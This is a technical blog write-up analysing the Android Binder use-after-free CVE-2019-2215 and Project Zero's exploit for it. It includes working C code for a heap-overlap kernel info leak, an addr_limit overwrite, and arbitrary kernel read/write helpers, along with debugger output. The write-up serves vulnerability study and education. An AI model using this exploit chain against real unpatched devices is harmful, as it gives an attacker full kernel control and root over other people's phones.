Analyzing Android's CVE-2019-2215 (/dev/binder UAF)
Over the past few weeks, those of you who frequent the DAY[0] streams over on our Twitch may have seen me working on trying to understand the recent Android Binder Use-After-Free (UAF) published by Google's Project Zero (p0). This bug is actually not new, the issue was discovered and fixed in the mainline kernel in February 2018, however, p0 discovered many popular devices did not receive the patch downstream. Some of these devices include the Pixel 2, the Huawei P20, and Samsung Galaxy S7, S8, and S9 phones. I believe many of these devices received security patches within the last couple weeks that finally killed the bug.
After a few streams of poking around with a kernel debugger on a virtual machine (running Android-x86), and testing with a vulnerable Pixel 2, I've came to understand the exploit written by Jann Horn and Maddie Stone pretty well. Without an understanding of Binder (the binder_thread
object specifically), as well as how Vectored I/O works, the exploit can be pretty confusing. It's also quite clever how they exploited this issue, so I thought it would be cool to write up how the exploit works.
We'll mostly be focusing on how an arbitrary read/write primitive is established, we won't focus on the post-exploit stuff such as disabling SELinux and enabling full root capabilities as there are quite a few write-ups out there already that cover that. Here's a brief overview of what this article will cover:
- Basic overview of Binder and Vectored I/O
- Vulnerability details
- Leaking the kernel task struct
- Establishing an arbitrary read/write (arbitrary r/w) primitive
- Conclusion
Note that all code snippets will be from kernel v4.4.177, as this is the kernel I tested on personally.
Basic overview of Binder and Vectored I/O
Binder
The Binder driver is an Android-only driver which provides an easy method of Inter Process Communication (IPC), including Remote Procedure Calling (RPC). You will find this driver's source code in the mainline Linux kernel, however it is not configured for non-Android builds.
There are a few different binder device drivers that are used for different types of IPC. For communication between framework and app processes using the Android Interface Definition Language (AIDL), /dev/binder
is used. For communication between framework and vendor processes / hardware using the Hardware Abstraction Layer (HAL) Interface Definition Language (HIDL), /dev/hwbinder
is used. Finally, for vendors who want to use IPC between vendor processes without using HIDL, /dev/vndbinder
is used. For the purposes of the exploit, we only care about the first driver, /dev/binder
.
Like most IPC mechanisms in Linux, binder works through file descriptors, and you can add event polls to it using the EPOLL API.
Vectored I/O
Vectored I/O allows you to either write into a data stream using multiple buffers, or read from a data stream into multiple buffers. It's also known as "scatter/gather I/O". Vectored I/O offers a few advantages over non-vectored I/O. For one, you can write with or read to different buffers that are non-contiguous without a bunch of overhead. It's also atomic.
An example of where vectored I/O is useful is a data packet where you have a header followed by data in a contiguous block. Using vectored I/O, you can keep the header and the data in separate, non-contiguous buffers, and read to them or write using them with one system call instead of two.
How this works is you'll define an array of iovec
structures which contain information about all the buffers you'd like to use for I/O. The iovec
structure is relatively small, consisting only of two QWORDS (8 byte data) on 64-bit systems.
struct iovec { // Size: 0x10
void *iov_base; // 0x00
size_t iov_len; // 0x08
}
Vulnerability details
The Binder driver has a cleanup routine you can trigger from ioctl()
before actually closing the driver. If you're familiar with drivers and cleanup routines, you can likely already guess why this is can cause issues.
Let's look at the p0 report summary.
As described in the upstream commit:
“binder_poll() passes the thread->wait waitqueue that
can be slept on for work. When a thread that uses
epoll explicitly exits using BINDER_THREAD_EXIT,
the waitqueue is freed, but it is never removed
from the corresponding epoll data structure. When
the process subsequently exits, the epoll cleanup
code tries to access the waitlist, which results in
a use-after-free.
This summary is a bit misleading. The use-after-free is not on the waitqueue itself. The waitqueue is an inline struct in the binder_thread
structure, the binder_thread
object is what's actually UAF'd. The reason they mention the waitqueue directly in this commit summary is this issue was originally found by Google's Syzkaller fuzzer back in 2017, and the fuzzer triggered a use-after-free detected by the Kernel Address Sanitizer (KASAN) on the waitqueue's mutex.
The free
Let's take a look at the ioctl command in question, BINDER_THREAD_EXIT
.
static long binder_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
// [...]
switch (cmd) {
// [...]
case BINDER_THREAD_EXIT:
binder_debug(BINDER_DEBUG_THREADS, "%d:%d exit\n",
proc->pid, thread->pid);
binder_free_thread(proc, thread);
thread = NULL;
break;
// [...]
}
}
// [...]
static int binder_free_thread(struct binder_proc *proc,
struct binder_thread *thread)
{
struct binder_transaction *t;
struct binder_transaction *send_reply = NULL;
int active_transactions = 0;
// [...]
while (t) {
active_transactions++;
// [...]
}
if (send_reply)
binder_send_failed_reply(send_reply, BR_DEAD_REPLY);
binder_release_work(&thread->todo);
kfree(thread);
binder_stats_deleted(BINDER_STAT_THREAD);
return active_transactions;
}
The critical line of code here is line 2610, kfree(thread)
. This is where the "free" part of the use-after-free happens.
The use (after free)
Now that we've seen where the free happens, let's try to see where the use happens. The stack trace from the KASAN report will be helpful for this.
Call Trace:
...
_raw_spin_lock_irqsave+0x96/0xc0 kernel/locking/spinlock.c:159
remove_wait_queue+0x81/0x350 kernel/sched/wait.c:50
ep_remove_wait_queue fs/eventpoll.c:595 [inline]
ep_unregister_pollwait.isra.7+0x18c/0x590 fs/eventpoll.c:613
ep_free+0x13f/0x320 fs/eventpoll.c:830
ep_eventpoll_release+0x44/0x60 fs/eventpoll.c:862
...
At first, it can be a bit confusing because the binder_thread
object is referenced indirectly, ie. if you ctrl + f for binder_thread
you won't find any occurrences. However, if we quickly look at ep_unregister_pollwait()
:
static void ep_unregister_pollwait(struct eventpoll *ep, struct epitem *epi)
{
struct list_head *lsthead = &epi->pwqlist;
struct eppoll_entry *pwq;
while (!list_empty(lsthead)) {
pwq = list_first_entry(lsthead, struct eppoll_entry, llink);
list_del(&pwq->llink);
ep_remove_wait_queue(pwq);
kmem_cache_free(pwq_cache, pwq);
}
}
We'll notice our free'd binder_thread
is in epoll_entry
's linked list, and eventually will be what pwq
is.
static void ep_remove_wait_queue(struct eppoll_entry *pwq)
{
wait_queue_head_t *whead;
rcu_read_lock();
/*
* If it is cleared by POLLFREE, it should be rcu-safe.
* If we read NULL we need a barrier paired with
* smp_store_release() in ep_poll_callback(), otherwise
* we rely on whead->lock.
*/
whead = smp_load_acquire(&pwq->whead);
if (whead)
remove_wait_queue(whead, &pwq->wait);
rcu_read_unlock();
}
We can see that pwq
is used in two places. One is the head of the linked list for the wait queues, whead
. The other is the wait queue object itself being deleted via remove_wait_queue
.
At first glance it seems both arguments to remove_wait_queue
should be relatively close in memory, but the smp_load_acquire()
macro needs to be considered. This macro is a memory barrier. Initially I assumed this macro just added some compiler stuff for atomic access to whead
, but this was a mistake. What's not entirely obvious is smp_load_acquire()
macro dereferences what's passed to it. So what I originally read as whead = &pwq->whead
is actually more like whead = *(wait_queue_head_t *)&pwq->whead
, or more simply, whead = pwq->whead
.
Let's look at remove_wait_queue()
.
// WRITE-UP COMMENT: q points into stale data / the UAF object
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
{
unsigned long flags;
spin_lock_irqsave(&q->lock, flags);
__remove_wait_queue(q, wait);
spin_unlock_irqrestore(&q->lock, flags);
}
When the head of the linked list ends up being our UAF'd binder_thread
, q
points to stale data. This is why a KASAN crash occurs on the spinlock - it will attempt to lock the mutex on q
, which is free'd memory.
On normal devices not using KASAN instrumentation, if you run the Proof-of-Concept (PoC) as-is you likely won't notice anything. It's highly likely that no crash will occur, which may lead you to (incorrectly) assume the device is not vulnerable. This is because it is very likely q
still points to valid, stale heap data. However, if you perform a heap spray of 0x41
's, you will trigger a CPU stall, which will cause your device to freeze.
This is because a lock is essentially just an integer that's set to either 0 (for unlocked) or 1 (for locked). Technically, if the mutex is set to any value that's not zero, it's considered locked. Because an attacker-controlled heap spray will essentially lock the mutex without going through proper channels, this mutex will be permanently locked, which will cause a deadlock and freeze the device.
It's worth noting this object resides in the kmalloc-512
cache, which is a pretty decent cache for exploitation because it's not used a lot by background processes compared to smaller caches. On kernel v4.4.177, the object is 0x190
or 400 bytes in size. Because of this size being so far from both kmalloc-256
and kmalloc-512
- it's a fair assumption that this object ends up in the kmalloc-512
cache on most if not all devices.
Leaking the kernel task struct
Weaponizing an unlink
The way this vulnerability was exploited was quite clever. The exploit takes advantage of a linked list unlink operation. This can be used on an overlapped object to corrupt it using the linked list meta-data.
Assuming the spinlock doesn't deadlock on an invalid mutex due to memory corruption, eventually the next ep_remove_wait_queue()
's &pwq->wait
reference will point into our UAF'd object. Consider what remove_wait_queue()
, and inevitably, __remove_wait_queue()
, does on this structure:
// WRITEUP COMMENT: old points to stale data / the UAF object
static inline void
__remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
list_del(&old->task_list);
}
// ...
static inline void list_del(struct list_head *entry)
{
__list_del(entry->prev, entry->next);
entry->next = LIST_POISON1;
entry->prev = LIST_POISON2;
}
// ...
static inline void __list_del(struct list_head * prev, struct list_head * next)
{
next->prev = prev;
WRITE_ONCE(prev->next, next);
}
The main line of importance here is next->prev = prev
, This essentially is an unlink, and writes into our UAF'd object a pointer of the previous object.
This is useful because if we overlap another kernel object on top of our UAF'd object, we can weaponize this unlink to corrupt data in the overlapped object. This is used by p0 to leak kernel data. Which object is a good candidate for this attack strategy? Enter iovec
.
There are a few properties of theiovec
structure that makes it a really good candidate for exploitation here.
- They're small (0x10 in size on 64-bit machines) and you can control all the fields with very few restrictions
- You can stack them and thus control which kmalloc cache your
iovec
stack ends up in by how many you write with - They have a pointer (
iov_base
) which will be a perfect field to corrupt with the unlink.
Under normal circumstances, iov_base
is checked in the kernel anywhere it's used. The kernel will first ensure that iov_base
is a userland pointer before processing the request, however using the unlink primitive we just talked about, we can corrupt this pointer post-validation and overwrite it with a kernel pointer, being the prev
object in the unlink process.
This means when we read from a descriptor that was written to with the corrupted iovec
, we'll be reading data originating from a kernel pointer, not a userland one like it's intended. This will allow us to leak kernel data relative to the prev
pointer, which contains pointers useful enough to allow for arbitrary read/write as well as code execution.
The tricky step of this process is figuring out which iovec
's index lines up with the waitqueue. This is important because if we don't fake the mutex properly, the device will hang and we won't be able to have any fun on it.
Finding the offset of the waitqueue is fairly easy if you have a kernel image of the version you're targeting. By looking at a function that uses the waitqueue field of binder_thread
, we can easily find the offset in the disassembly. One such function is binder_wakeup_thread_ilocked()
. It calls wake_up_interruptible_sync(&thread->wait)
. The offset should be referenced when the address is loaded into the X0 register just before the call.
.text:0000000000C0E2B4 ADD X0, X8, #0xA0
.text:0000000000C0E2B8 MOV W1, #1
.text:0000000000C0E2BC MOV W2, #1
.text:0000000000C0E2C0 TBZ W19, #0, loc_C0E2CC
.text:0000000000C0E2C4 BL __wake_up_sync
On kernel v4.4.177, we can see the wait queue is 0xA0
bytes into the binder_thread
object. Since iovec
is 0x10 in size, this means the iovec
at index 0xA
in the array will line up with the wait queue.
#define BINDER_THREAD_SZ 0x190
#define IOVEC_ARRAY_SZ (BINDER_THREAD_SZ / 16)
#define WAITQUEUE_OFFSET 0xA0
#define IOVEC_INDX_FOR_WQ (WAITQUEUE_OFFSET / 16)
So how does one pass a valid iov_base
address which will pass validation while also keeping the lock at 0 to prevent a deadlock? Since the lock is only a DWORD (4 bytes), and a 64-bit pointer can be passed, you just need to use mmap()
to map a userland address where the lower 32-bits are 0.
dummy_page = mmap((void *)0x100000000ul, 2 * PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
// ...
struct iovec iovec_array[IOVEC_ARRAY_SZ];
memset(iovec_array, 0, sizeof(iovec_array));
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page_4g_aligned; /* spinlock in the low address half must be zero */
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; /* wq->task_list->next */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; /* wq->task_list->prev */
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;
When the exploit runs, the iovec
at IOVEC_INDX_FOR_WQ
will take the place of the mutex, as well as the next
pointer in the linked list. The iovec
at IOVEC_INDX_FOR_WQ + 1
will take the place of the prev
pointer in the linked list. This means IOVEC_INDX_FOR_WQ + 1
's iov_base
field is the one that will be overwritten with a kernel pointer.
Let's take a look at the free'd memory in KGDB on a VM running Android-x86 before and after the unlink operation. To do this, I set a breakpoint on the call to remove_wait_queue()
. The first argument will point to the free'd memory, so we'll find the pointer in the RDI register. If we examine this memory before the call, we'll see the following:
Thread 1 hit Breakpoint 11, 0xffffffff812811c2 in ep_unregister_pollwait.isra ()
gdb-peda$ x/50wx $rdi
0xffff8880959d68a0: 0x00000000 0x00000001 0x00001000 0x00000000
0xffff8880959d68b0: 0xdeadbeef 0x00000000 0x00001000 0x00000000
...
Notice the data overlaps with some iovec
structures from above - for example we can see 0xdeadbeef at 0xffff88809239a6b0
. Now let's take a look at the same memory after the the unlink occurs. We'll set a breakpoint at the end of ep_unregister_pollwait
and examine the same memory.
Thread 1 hit Breakpoint 12, 0xffffffff812811ee in ep_unregister_pollwait.isra ()
gdb-peda$ x/50wx 0xffff8880959d68a0
0xffff8880959d68a0: 0x00000000 0x00000001 0x959d68a8 0xffff8880
0xffff8880959d68b0: 0x959d68a8 0xffff8880 0x00001000 0x00000000
...
The iov_len
of the iovec
at IOVEC_INDX_FOR_WQ
was overwritten with a kernel pointer, and the iov_base
of the iovec
at IOVEC_INDX_FOR_WQ + 1
was overwritten with the same kernel pointer - thus corrupting the iovec
's internal backing structure in the kernel heap!
Triggering the leak
It seems p0 decided to go with a pipe as the medium for the leak. The attack strategy is basically as follows:
- Create a pipe
- Trigger the free() on the
binder_thread
object so that theiovec
structures allocated in the next step overlap it - Write the
iovec
structures intobinder_thread
's old memory via thewritev()
system call on the pipe - Trigger the use-after-free / unlink to corrupt the
iovec
structure - Call
read()
on the pipe, which will use the uncorruptediovec
atIOVEC_INDX_FOR_WQ
to read thedummy_page
data. - Call
read()
on the pipe again, which will use the corruptediovec
atIOVEC_INDX_FOR_WQ + 1
to read kernel data into the leak buffer.
Because we initialized two iovec
's with an iov_len
of 0x1000, ultimately the writev()
call will write two pages of data. The first page will contain data from dummy_page
, which isn't useful for exploitation. The second page will contain kernel data!
It's easier to handle the reads and writes in two separate threads. The parent thread is responsible for:
- Triggering the free() on
binder_thread
- Writing the
iovec
stack to the pipe connected to the child process, which will overlap the free'dbinder_thread
- (waits on the child thread)
- Reading the second page of leaked kernel data
The child thread is responsible for:
- Corrupting the
iovec
by triggering the unlink via deletion of the EPOLL event - Reading the first page of dummy data
When we put this all together, here's our leak code: (note that functionally this is similar to p0's except I cleaned it up a bit and ported it to an app, hence __android_log_print()
)
struct epoll_event event = {.events = EPOLLIN};
struct iovec iovec_array[IOVEC_ARRAY_SZ];
char leakBuff[0x1000];
int pipefd[2];
int byteSent;
pid_t pid;
memset(iovec_array, 0, sizeof(iovec_array));
if(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event))
exitWithError("EPOLL_CTL_ADD failed: %s", strerror(errno));
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 0x1000; // linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x1000;
if(pipe(pipefd))
exitWithError("Pipe failed: %s", strerror(errno));
if(fcntl(pipefd[0], F_SETPIPE_SZ, 0x1000) != 0x1000)
exitWithError("F_SETPIPE_SZ failed: %s", strerror(errno));
pid = fork();
if(pid == 0)
{
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);
if(read(pipefd[0], leakBuff, sizeof(leakBuff)) != sizeof(leakBuff))
exitWithError("[CHILD] Read failed: %s", strerror(errno));
close(pipefd[1]);
_exit(0);
}
ioctl(fd, BINDER_THREAD_EXIT, NULL);
byteSent = writev(pipefd[1], iovec_array, IOVEC_ARRAY_SZ);
if(byteSent != 0x2000)
exitWithError("[PARENT] Leak failed: writev returned %d, expected 0x2000.", byteSent);
if(read(pipefd[0], leakBuff, sizeof(leakBuff)) != sizeof(leakBuff))
exitWithError("[PARENT] Read failed: %s", strerror(errno));
__android_log_print(ANDROID_LOG_INFO, "EXPLOIT", "leak + 0xE8 = %lx\n", *(uint64_t *)(leakBuff + 0xE8));
thread_info = *(unsigned long *)(leakBuff + 0xE8);
When we run this app, we'll get something similar to the following in logcat:
com.example.binderuaf I/EXPLOIT: leak + 0xE8 = fffffffec88c5700
This pointer points to the current process thread_info
struct. This structure has a very useful field we can leverage to get an arbitrary read/write primitive.
Establishing an arbitrary read/write (arbitrary r/w) primitive
Breaking the limits
So we've leaked a useful kernel pointer, now what? Let's take a look at the first few members of task_info
, the object we're leaking the address of.
struct thread_info {
unsigned long flags; /* low level flags */
mm_segment_t addr_limit; /* address limit */
struct task_struct *task; /* main task structure */
int preempt_count; /* 0 => preemptable, <0 => bug */
int cpu; /* cpu */
};
The field of interest here is addr_limit
. There are some very important macros that reference this field in terms of security. Let's look at one of them - access_ok
.
#define access_ok(type, addr, size) __range_ok(addr, size)
From the comment of __range_ok()
- it's essentially equivalent to (u65)addr + (u65)size <= current->addr_limit
. This macro is used pretty much everywhere the kernel tries to access a user-provided pointer. It's used to ensure the pointer provided is really a userland pointer - and prevents people from trying to be clever by passing kernel pointers where the kernel expects userland pointers. See where I'm going with this? :)
Once this addr_limit
is smashed, you can freely pass kernel pointers into where userland pointers are expected, and access_ok()
will never fail.
Getting a controlled write primitive
We've already demonstrated we can use the unlink to read and leak kernel data - but what about modify it? Turns out we can do that too! To leak kernel data, we wrote non-contiguously into a file descriptor with a stack of iovec
structures, and corrupted one of them with the unlink so that a read()
call later on would leak data.
To corrupt kernel data, we go the other way. By calling recvmsg()
with a stack of iovec
structures and corrupting it the same way, we can force the data we wrote using write()
to be copied over the sequential iovec
structures to get an arbitrary write.
Let's look at the iovec
stack we slot into our UAF'd object with recvmsg()
.
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; // linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; // iov_len of previous, then this element and next element
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD;
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8;
Similar to the infoleak case, the unlink corrupts the IOVEC_INDX_FOR_WQ
's iovec.iov_len
and IOVEC_INDEX_FOR_WQ + 1
's iovec.iov_base
with kernel pointers pointing directly to IOVEC_INDX_FOR_WQ
's iovec.iov_len
, however, this time it's splitting data we've written using these iovec
structures.
Just like the infoleak case, the unlink corrupts the iov_len
of the iovec
at IOVEC_INDX_FOR_WQ
, and the iov_base
of the iovec
at IOVEC_INDX_FOR_WQ + 1
with a kernel pointer. This kernel pointer isn't just pointing into some random data somewhere - if we take a look at the KGDB output again, we'll notice it points to iov_len
of the iovec
at IOVEC_INDX_FOR_WQ
!
Once recvmsg()
reaches this iovec
, it will start copying the data we wrote with write()
into this pointer - which allows us to write arbitrary data into the following iovec
structs post-validation. This allows us to pass any pointer we want into the iov_base
of the next iovec
- giving us an arbitrary write. We control what gets written to this address with the tailing QWORD of the write()
.
If we look at the data that gets written, we can indeed see that it aligns with the backing data of iov_len
at IOVEC_INDX_FOR_WQ
onwards.
unsigned long second_write_chunk[] = {
1, /* iov_len */
0xdeadbeef, /* iov_base (already used) */
0x8 + 2 * 0x10, /* iov_len (already used) */
current_ptr + 0x8, /* next iov_base (addr_limit) */
8, /* next iov_len (sizeof(addr_limit)) */
0xfffffffffffffffe /* value to write */
};
The attack strategy is as follows:
- Create a socketpair
- Trigger the free() on the
binder_thread
object so thatrecvmsg()
'siovec
stack overlapsbinder_thread
- Preemptively write 1 byte to satisfy the first
iovec
- Write the
iovec
structures intobinder_thread
's old memory viarecvmsg()
- Trigger the use-after-free / unlink to corrupt the
iovec
structure - Call
write()
on the socketpair, which will use the corruptediovec
to corrupt the nextiovec
to do a controlled memory corruption.
Again just like the leak, two threads are needed. The parent thread is responsible for:
- Preemptively writing 1 byte of data to satisfy
recvmsg()
's firstiovec
request. - Triggering the free() on
binder_thread
- Writing the
iovec
stack to the socket and waiting on data that matches theiovec
requests viarecvmsg()
The child thread is responsible for:
- Corrupting the
iovec
by triggering the unlink via deletion of the EPOLL event - Writing the data that will corrupt the proceeding
iovec
structures when the parent thread'srecvmsg()
call continues.
Putting this all together, we end up with the following code to smash the parent process addr_limit
. Again, functionally this code is the same as p0's however it's cleaned up and uses JNI functions.
#define OFFSET_OF_ADDR_LIMIT 8
struct epoll_event event = {.events = EPOLLIN};
struct iovec iovec_array[IOVEC_ARRAY_SZ];
int iovec_corruption_payload_sz;
int sockfd[2];
int byteSent;
pid_t pid;
memset(iovec_array, 0, sizeof(iovec_array));
if(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &event))
exitWithError("EPOLL_CTL_ADD failed: %s", strerror(errno));
unsigned long iovec_corruption_payload[] = {
1, // IOVEC_INDX_FOR_WQ -> iov_len
0xdeadbeef, // IOVEC_INDX_FOR_WQ + 1 -> iov_base
0x8 + (2 * 0x10), // IOVEC_INDX_FOR_WQ + 1 -> iov_len
thread_info + OFFSET_OF_ADDR_LIMIT, // Arb. Write location! IOVEC_INDEX_FOR_WQ + 2 -> iov_base
8, // Arb. Write size (only need a QWORD)! IOVEC_INDEX_FOR_WQ + 2 -> iov_len
0xfffffffffffffffe, // Arb. Write value! Smash it so we can write anywhere.
};
iovec_corruption_payload_sz = sizeof(iovec_corruption_payload);
iovec_array[IOVEC_INDX_FOR_WQ].iov_base = dummy_page; // mutex
iovec_array[IOVEC_INDX_FOR_WQ].iov_len = 1; // only ask for one byte since we'll only write one byte - linked list next
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_base = (void *)0xDEADBEEF; // linked list prev
iovec_array[IOVEC_INDX_FOR_WQ + 1].iov_len = 0x8 + 2 * 0x10; // length of previous iovec + this one + the next one
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_base = (void *)0xBEEFDEAD; // will get smashed by iovec_corruption_payload
iovec_array[IOVEC_INDX_FOR_WQ + 2].iov_len = 8;
if(socketpair(AF_UNIX, SOCK_STREAM, 0, sockfd))
exitWithError("Socket pair failed: %s", strerror(errno));
// Preemptively satisfy the first iovec request
if(write(sockfd[1], "X", 1) != 1)
exitWithError("Write 1 byte failed: %s", strerror(errno));
pid = fork();
if(pid == 0)
{
prctl(PR_SET_PDEATHSIG, SIGKILL);
sleep(2);
epoll_ctl(epfd, EPOLL_CTL_DEL, fd, &event);
byteSent = write(sockfd[1], iovec_corruption_payload, iovec_corruption_payload_sz);
if(byteSent != iovec_corruption_payload_sz)
exitWithError("[CHILD] Write returned %d, expected %d.", byteSent, iovec_corruption_payload_sz);
_exit(0);
}
ioctl(fd, BINDER_THREAD_EXIT, NULL);
struct msghdr msg = {
.msg_iov = iovec_array,
.msg_iovlen = IOVEC_ARRAY_SZ
};
recvmsg(sockfd[0], &msg, MSG_WAITALL);
Arbitrary Read/Write Helper Functions
Now that the process address limit has been smashed, arbitrary kernel read/write is as simple as a few read()
and write()
syscalls. By simply writing the data we want to write to a pipe with write()
, and calling read()
on the other end of the pipe with a kernel address, we can pipe data to an arbitrary kernel address.
Conversely, by writing data from an arbitrary kernel address to a pipe, and calling read()
on the other end of the pipe, we can pipe data from an arbitrary kernel address. Boom, arbitrary read/write!
int kernel_rw_pipe[2];
//...
if(pipe(kernel_rw_pipe))
exitWithError("Kernel R/W Pipe failed: %s", strerror(errno));
//...
void kernel_write(unsigned long kaddr, void *data, size_t len)
{
if(len > 0x1000)
exitWithError("Reads/writes over the size of a page results causes issues.");
if(write(kernel_rw_pipe[1], data, len) != len)
exitWithError("Failed to write data to kernel (write)!");
if(read(kernel_rw_pipe[0], (void *)kaddr, len) != len)
exitWithError("Failed to write data to kernel (read)!");
}
void kernel_read(unsigned long kaddr, void *data, size_t len)
{
if(len > 0x1000)
exitWithError("Reads/writes over the size of a page results causes issues.");
if(write(kernel_rw_pipe[1], (void *)kaddr, len) != len)
exitWithError("Failed to read data from kernel (write)!");
if(read(kernel_rw_pipe[0], data, len) != len)
exitWithError("Failed to read data from kernel (read)!");
}
Additional Notes
Some devices (even if they're vulnerable) may fail on the writev()
in the leak call, as it'll return 0x1000 instead of the desired 0x2000. This is usually because the offset for the waitqueue is incorrect, therefore the second iovec.iov_base
isn't getting smashed with a kernel pointer. This will cause the call to return 0x1000 because the second request will fail, since 0xdeadbeef
is an unmapped address.
In this case, you'll have to extract the kernel image for the version you're targeting and pull the proper offsets (or potentially bruteforce it).
Conclusion
Once you have kernel read/write, it's basically game over. A root shell is a cred
patch away. If you're not on a Samsung device, you can take it a step further and disable SELinux and patch the init_task
credentials so every new process that launches post-exploit automatically launches with full privileges. On Samsung devices, I do not believe this is possible without extra work due to their Knox mitigation. On most other devices though, these additional patches shouldn't be an issue.
It's worth noting that p0's exploit is remarkably stable. It very rarely fails, and when it does it's usually just an error, not a kernel panic, so you just need to run the exploit again and you're good to go. This makes it an awesome temporary root method for people with OEM locked bootloaders like me.
Overall, I thought this exploit strategy by Jann Horn and Maddie Stone was pretty novel, and I definitely learned a lot breaking it down. It gave me a fresh perspective on use-after-free's, demonstrating that you're not totally out of luck if you can't get a useful primitive from the UAF'd object itself.
References / Additional Resources
Issue 1942: Android; Use-After-Free in Binder driver (Chromium Bug Tracker)
Bootlin Linux kernel source browser
Credit
Jann Horn and Maddie Stone for the exploit code referenced in the write-up.